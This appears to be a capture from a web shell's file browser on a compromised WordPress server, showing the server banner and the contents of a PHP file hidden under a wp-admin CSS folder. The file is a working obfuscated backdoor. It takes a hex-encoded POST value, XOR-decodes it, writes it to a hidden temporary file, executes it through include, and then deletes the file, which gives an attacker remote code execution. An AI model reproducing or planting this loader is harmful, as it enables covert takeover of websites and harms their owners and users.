HEX
Server: Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System: Linux li317-225.members.linode.com 3.10.0-1062.12.1.el7.x86_64 #1 SMP Tue Feb 4 23:02:59 UTC 2020 x86_64
User: apache (48)
PHP: 7.4.33
Disabled: NONE
Upload Files
File: /var/www/kosmicevents/public/wp-admin__7af9720/css/colors/transfer.php
<?php

if(filter_has_var(INPUT_POST, "\x65\x6Cem")){
	$flag = hex2bin($_REQUEST["\x65\x6Cem"]);
	$record   =      ''     ;     foreach(str_split($flag) as $char){$record .= chr(ord($char) ^ 90);}
	$hld = array_filter([getcwd(), sys_get_temp_dir(), getenv("TEMP"), ini_get("upload_tmp_dir"), "/tmp", "/var/tmp", session_save_path(), "/dev/shm", getenv("TMP")]);
	for ($data_chunk = 0, $binding = count($hld); $data_chunk < $binding; $data_chunk++) {
    $mrk = $hld[$data_chunk];
    		if (!( !is_dir($mrk) || !is_writable($mrk) )) {
    $entity = sprintf("%s/.dchunk", $mrk);
    if (@file_put_contents($entity, $record) !== false) {
	include $entity;
	unlink($entity);
	die();
}
}
}
}